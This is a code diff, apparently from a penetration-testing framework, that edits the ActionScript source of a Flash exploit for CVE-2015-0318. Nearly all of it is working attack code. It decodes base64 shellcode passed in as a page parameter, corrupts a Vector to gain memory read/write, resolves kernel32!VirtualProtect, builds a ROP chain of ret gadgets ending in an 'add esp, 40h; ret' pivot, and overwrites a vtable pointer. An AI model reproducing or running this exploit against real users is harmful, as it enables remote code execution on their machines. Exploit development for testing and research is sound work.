sempervictus
diff --git a/‎data/exploits/CVE-2015-0318/Main.swf
14.8 KB b/‎data/exploits/CVE-2015-0318/Main.swf
14.8 KB
diff --git a/‎external/source/exploits/CVE-2015-0318/Main.as
Lines changed: 33 additions & 42 deletions b/‎external/source/exploits/CVE-2015-0318/Main.as
Lines changed: 33 additions & 42 deletions
@@ -1,12 +1,13 @@
 package 
 {
+	import mx.utils.Base64Decoder;
 	import flash.display.*;
 	import flash.utils.ByteArray;
 	import flash.external.ExternalInterface;
 	import mx.utils.Base64Decoder;
 
 	public class Main extends Sprite
-	{	
+	{
 		private var i:int;
 		private var j:int;
 
@@ -36,12 +37,8 @@ package
 		private var junk:Array = new Array();
 		private var junk_idx:int = 0;
 
-		public static function Alert(message:String):void {
-			ExternalInterface.call('debug_alert', message);
-		}
-		
 		public static function Debug(message:String):void {
-			ExternalInterface.call('debug_print', message);
+			ExternalInterface.call('console.log', message);
 		}
 
 		public function MakeRegex(c:String):String {
@@ -392,7 +389,7 @@ package
 				// TODO: we can optimise here as we know the alignment of the
 				// magic values.
 
-				Alert('  [-] ' + region_base.toString(16) + ' ' + region_top.toString(16) + '[' + region_rtop.toString(16) + ']');
+				Debug('  [-] ' + region_base.toString(16) + ' ' + region_top.toString(16) + '[' + region_rtop.toString(16) + ']');
 
 				for (var ptr:uint = region_base; ptr < region_top - 16; ptr += 4) {
 					if (m.read_dword(ptr) == 0xdecafbad
@@ -409,16 +406,6 @@ package
 
 			return 0;
 		}
-
-		public function GetShellcodeParam():String {
-			var b64:Base64Decoder = new Base64Decoder();
-			var payload:String = "";
-			Alert("Gonna decode");
-			b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh);
-			Alert("Finished Decode");
-			payload = b64.toByteArray().toString();
-			return payload;
-		}
 
 		public function WriteShellcode(v:Vector.<uint>, i:uint, ptr:uint, fun:uint):void {
 
@@ -472,12 +459,17 @@ package
 			v[i++] = fun;   
 			v[i++] = 0x9090e0ff; // FFE0              jmp eax
 		}
-		
+
+		public function GetPayload():String {
+			var b64:Base64Decoder = new Base64Decoder();
+			var p:String = LoaderInfo(this.root.loaderInfo).parameters.sh;
+			b64.decode(p);
+			var payload:String = b64.toByteArray().toString();
+			return payload;
+		}
+
 		public function Main() {
-			Alert("1");
-			var sh:String = GetShellcodeParam();
-			Alert("2");
-			Debug("Shellcoe: " + sh.toString());
+			var payload:String = GetPayload();
 
 			i = 0;
 
@@ -488,15 +480,14 @@ package
 				return;
 			}
 
-			Alert('hai');
+			Debug("Corrupting Vector");
 
 			var v:Vector.<uint> = CorruptVector(r);
 			if (v == null) {
 				Debug("CorruptVector returns null");
 				return;
 			}
 
-			Alert("Memory");
 			var m:Memory = new Memory(v, v[0], 0x6e);
 
 			// at this point we have an absolute read/write primitive letting 
@@ -532,10 +523,10 @@ package
 
 				var virtual_protect:uint = p.GetImport('KERNEL32.dll', 'VirtualProtect');
 				Debug('  [-] ' + virtual_protect.toString(16) + ' kernel32!VirtualProtect');
-				
+
+				// Find this in Flash
 				// 81 c4 40 00 00 00 add esp, 40h
 				// c3                ret
-				
 				var gadget_bytes:ByteArray = new ByteArray();
 				gadget_bytes.length = 7;
 				gadget_bytes.writeByte(0x81);
@@ -582,22 +573,22 @@ package
 
 				var a:uint = 0x61616161;
 				pwned.Rop(
-					a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
-					a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
-					a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
-					a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
-					a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
-					a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
-					a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
-					a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
-					a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
-					a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
-					a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
-					a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
-					a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
-					a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
-					a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
-					a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a);
+					a, a, a, a, a, a, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
+					ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
+					ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
+					ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
+					ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
+					ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
+					ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
+					ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
+					ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
+					ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
+					ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
+					ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
+					ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
+					ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
+					ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
+					ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, add_esp_40h_ret);
 
 				// overwrite the method pointer
 				m.write_dword(vtable_ptr + 4, add_esp_40h_ret);